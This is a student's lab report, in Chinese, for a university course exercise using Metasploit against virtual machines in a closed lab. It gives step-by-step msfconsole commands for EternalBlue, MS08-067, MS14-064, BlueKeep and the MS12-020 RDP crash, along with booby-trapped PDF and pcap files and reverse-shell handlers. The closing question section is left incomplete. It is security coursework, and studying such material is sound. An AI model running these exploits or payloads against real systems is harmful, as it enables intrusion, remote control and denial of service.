掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

主要模块
模块是指Metasploit框架中所使用的一段软件代码组件。
通过命令进入源码目录:/usr/share/metasploit-framework/modules 也可以看到相应模块

msfconsole的相关操作
ms08-067(成功)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows 2000 Professional(192.168.11.145)
实验准备

nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.11.145 试探靶机是否存在此漏洞
在攻击机 kali 中通过 msfconsole 进入控制台,依次输入以下命令:
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set LHOST 192.168.11.128
set LPORT 5218
set RHOST 192.168.11.145
set target 0
exploit



(一)MS14-064---win7篇(失败且唯一)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows 7(192.168.11.144)
IE版本:8.0.7601.17514


在攻击机 kali 中通过 msfconsole 进入控制台,依次输入以下命令:
use exploit/windows/browser/ms14_064_ole_code_execution
show payloads //显示可用攻击载荷

set payload windows/meterpreter/reverse_tcp
set SRVHOST 192.168.11.128 //设置攻击机IP
set LHOST 192.168.11.128 //攻击机IP
set LPORT 5218 //设置攻击端口
show targets

set target 1
show options

exploit
将生成的URL地址在 win7 的IE浏览器中打开






(二)MS14-064(payload windows/shell_bind_tcp)---winxp篇(成功且唯一)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows XP(192.168.11.146)
IE版本:8.0.6001.18702


在攻击机 kali 中通过 msfconsole 进入控制台,依次输入以下命令:
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/shell_bind_tcp
set SRVHOST 192.168.11.128 //设置攻击机IP
set LHOST 192.168.11.128 //攻击机IP
set LPORT 5218 //设置攻击端口
show targets
set target 0

show options 发现还需要设靶机IP
set RHOST 192.168.11.146 //靶机IP
exploit
将生成的URL地址在 win7 的IE浏览器中打开


(三)ms17_010---win7篇(成功)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows 7(192.168.11.144)
IE版本:8.0.7601.17514


在攻击机 kali 中通过 msfconsole 进入控制台,依次输入以下命令:
use exploit/windows/smb/ms17_010_eternalblue
show payloads //显示可用攻击载荷

set payload generic/shell_reverse_tcp
set RHOST 192.168.11.144 //靶机IP
set LHOST 192.168.11.128 //攻击机IP
set LPORT 5218 //设置攻击端口
show options

exploit
在靶机 win7 的IE浏览器输入 https://攻击机IP:监听端口



(一)Adobe(成功)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows XP(192.168.11.146)

在攻击机 kali 中通过 msfconsole 进入控制台,依次输入以下命令:
search adobe //进行查找

use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.11.128 //攻击机IP
set LPORT 5218 //设置攻击端口
show options
exploit

生成msf.pdf(之前可以通过命令set FILENAME +名字 来生成自定义的名字)保存在 /home/kali/.msf4/local 目录下
另外打开一个终端通过命令 cd /home/kali/.msf4/local 进入目录,输入 ls 可以查看到文件所处其中
输入命令 mv msf.pdf /home/kali/wlgf/exp6 将生成的 msf.pdf 移动到指定目录下
然后可以在图形界面进入到该刚刚指定目录,将文件先复制到主机 WIN10 上,再从 WIN10 将文件复制到靶机 WIN XP 上
控制台中直接通过use exploit/multi/handler,进入监听模块,或者先输入back退出当前模块,然后再输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.11.128
set LPORT 5218
exploit


(二)wireshark(成功)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows XP(192.168.11.146)
wireshark 版本:1.4.0.34005


在攻击机 kali 中通过 msfconsole 进入控制台,依次输入以下命令:
use windows/fileformat/wireshark_packet_dect
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.11.128 //攻击机IP
set LPORT 5218 //设置攻击端口
set FILENAME 20175218cjy.pcap //设置生成文件的名字
exploit

生成 20175218cjy.pcap 保存在 /home/kali/.msf4/local 目录下
另外打开一个终端通过命令 cd /home/kali/.msf4/local 进入目录,输入 ls 可以查看到文件所处其中
输入命令 mv 20175218cjy.pcap /home/kali/wlgf/exp6 将生成的 20175218cjy.pcap 移动到指定目录下
然后可以在图形界面进入到该刚刚指定目录,将文件先复制到主机 WIN10 上,再从 WIN10 将文件复制到靶机 WIN XP 上
控制台中直接通过use exploit/multi/handler,进入监听模块,或者先输入back退出当前模块,然后再输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.11.128
set LPORT 5218
exploit


在实验二最初接触MSF的时候,在网上进行搜索,无意间发现了这个攻击,但是由于但是对MSF模块也不是很熟悉就放弃了。这次利用模块进行攻击,我就想起这个来了,然后在这里就进行尝试,不知道有没有人跟我一样用到这个(这个攻击在网上挺容易搜到的......)
(一)kali-蓝屏攻击(ms12-020)--win7篇(失败且唯一)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows 7(192.168.11.144)

cd /usr/share/metasploit-framework/modules/auxiliary 进入辅助模块,输入ls查看到 dos ,进入 /dos/windows/rdp 就可以看到 ms12-020 了
search ms12-020 搜索到 ms12-020 模块
其中,上面那个 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 是攻击模块,这里暂时先不用它,先用下面的搜索模块进行搜索,查看是否具有攻击条件
输入 use auxiliary/scanner/rdp/ms12_020_check //使用搜索模块
然后输入 show options 查看配置信息

可以看到这个攻击需要靶机开启3389端口,而且是启动 RDP 服务的(远程桌面控制)。看来这个条件还是略微有点复杂,这里就先在win7上打开3389端口和启动 RDP 服务,具体方法参考开启和关闭远程Windows系统3389端口和RDP服务开启
然后在 kali 中输入 set RHOSTS 192.168.11.1/24 //设置扫描网段
在通过 run 开始扫描网段内 3389 打开的地址
当扫描到 192.168.11.144 的时候,发现它的 3389 端口是打开的,接下来就可以进行攻击了,也就是使用 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 模块

依次输入以下命令:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.11.144 //靶机IP
show options

run
很兴奋得输入run回车,转到win7就等着出现蓝屏,结果等了一会,啥反应也没有。回到 kali 一看,发现显示说 RDP 服务没开。
这就很纳闷了,明明是打开的,为啥不行呢,上网查了之后发现说最新的win7已经修复了这个漏洞,我......这个是不是得弄个老版没有打啥补丁的win7来啊......唉,还是换个系统看看
(二)kali-蓝屏攻击(ms12-020)--windows server 2008篇(成功且唯一)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows server 2008(192.168.11.132)

同样还是先进行扫描,条件具备后,现在进行攻击
依次输入以下命令:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.11.132 //靶机IP
run


为了防止跟同学重复(毕竟网上比较容易看到这个蓝屏攻击(ms12-020),于是我继续做了一个辅助模块的)
(三)CVE-2019-0708漏洞复现(成功且唯一)
实验环境
攻击机:kali(192.168.11.128)
靶机:Windows XP(192.168.11.146)


依次输入以下命令:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep //使用扫描模块
show options
set RHOST 192.168.11.146 //靶机IP
run

发现这个也是利用了 3389 端口以及远程桌面控制,那几个RDP服务都是启用的(这个也能造成蓝屏)。扫描结果说可以攻击,但是有可能被杀掉,先不管,攻击了再说(为啥攻击就觉得很兴奋...)
依次输入以下命令:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻击模块
show targets //选择目标主机类型
set target 4
set RHOST 192.168.11.146 //靶机IP
run

结果真如扫描一样,可能被杀掉这个,但是没关系,可以重复 run 直到出现会话连接
出现会话连接,我到 winxp 上查看,发现竟然没有蓝屏


关于没有蓝屏,我觉得可能就是因为这个杀掉了的原因,但是通过多次攻击run,建立了会话,还是可以获取shell,但是蓝屏却弄不了了,这个还是winxp,网上很多人都是win7及以上基本上都修复了这个漏洞,所以这里就没有测试win7了(不想第三次在win7上摔倒...)
这其实是我的辅助模块的一个尝试,就是利用辅助模块中的docx,也就是通过生成一个docx文件,然后启用监听,在靶机上运行,然后获取回连。我攻击的对象是winxp,由于在winxp上没有安装打开docx的word之类的软件,然后又由于winxp系统的版本比较老,所以上网搜索可以适用的word版本,发现wps都可以适用。然后下载安装wps,用wps打开文件,结果发现不能建立回连,在kali上都没反应。
解决方法: 后来重新上网查询,发现word2003可以适用于winxp,于是又下载了word2003。然后重新选择载荷,重新生成了一个docx文件,复制到winxp中用word打开,发现成功建立回连,这好像跟office有关,这个攻击也是针对office的一个攻击,幸好2003版本也是比较老了,不然攻击成功与否还是难以预料的,由于做的时候出错了,也算是在尝试,没有截图,所以不好写入实验步骤中,就没有写进去了,仅在这里进行阐述。
还有一个不算问题,就是最后每次在攻击前将虚拟机拍摄一个快照,这样如果真的把虚拟机弄崩了(几率较小),还可以回到之前的状态而不用重新安装虚拟机,这也算是一个建议吧。
(1)用自己的话解释什么是exploit,payload,encode.
答:
答:通过这次实验,我还是知道这些攻击的不容易,跟实战还是有一定的差距的,比如:
这次实验,总的来说不是很困难,但是做得还算比较顺利,特别是跟上一次实验对比,简直是轻松太多了(还在上一次实验阴影中...)。而且这次实验的过程还非常有趣,富有挑战性,每一次攻击都是一次挑战,攻击成功就是挑战成功,攻击失败则为挑战失败,很刺激。当然成功的时候很高兴,失败就不行了(被win7制裁2次...)。总而言之,这次实验,通过不断尝试利用MSF进行攻击,这样来掌握了metasploit的基本应用方式,对常用的三种攻击方式也熟悉了不少,学到了很多,但是同时也知道,自己对于真的的技术还是差很多的,就像这次,被win7都制裁了三次,只能拿winxp来,或者更古老的win2000来出气......所以希望在以后的学习中能够学到更多,不断充实自己。
2019-2020-2 20175218陈敬勇 《网络对抗技术》 Exp6 MSF基础应用
原文:https://www.cnblogs.com/cjy-123/p/12786083.html